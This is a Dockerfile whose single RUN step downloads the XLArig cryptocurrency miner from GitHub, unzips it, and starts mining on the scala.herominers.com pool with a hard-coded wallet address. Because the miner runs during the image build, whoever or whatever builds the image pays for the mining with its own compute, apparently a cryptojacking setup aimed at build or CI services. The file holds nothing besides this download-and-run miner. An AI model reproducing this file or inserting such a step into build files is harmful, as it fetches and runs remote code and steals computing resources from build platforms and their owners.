FROM ubuntu:latest
RUN apt-get update -y && \
    apt-get install wget unzip -y && \
    wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-linux-x86_64.zip && \
    unzip XLArig-v5.2.2-linux-x86_64.zip && \
    ./xlarig -o scala.herominers.com:10131 -u Svkg8T1mFc5erwSrStWsL3QYy4cd78nT3Uuj4XrPvdxQJb57824s9gSCadarpVJD4PbCopT4ZKqLCHgQxYS2epRg26GeZnZat -p asad -a panthera -k